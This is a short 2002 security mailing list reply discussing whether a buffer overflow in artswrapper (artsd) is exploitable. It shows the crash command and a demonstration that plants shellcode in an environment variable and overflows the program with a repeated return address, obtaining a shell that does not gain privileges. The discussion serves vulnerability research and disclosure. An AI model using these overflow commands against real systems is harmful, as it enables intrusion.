Vulnerability Development mailing list archives

Re: artsd overflow


From: "Charles 'core' Stevenson" <core () dekode org>
Date: Fri, 04 Jan 2002 00:18:08 -0700

Fuska wrote:
r00t:~$ artswrapper -m `perl -e 'print "A"x3000'`
running as realtime process now (priority 50)
Segmentation fault

  Is this exploitable?
core@euclid:~/tmp$ export EXECSHELL=`./execve_ppc`
...
core@euclid:~/tmp$ artswrapper -m `perl -e 'print
"\x7f\xff\xfe\x10"x750;'`
running as realtime process now (priority 50)
sh-2.05a$ id
uid=1000(core) gid=1000(core) groups=1000(core)
sh-2.05a$ Alarm clock

Not directly at least...

peace,
core


Current thread: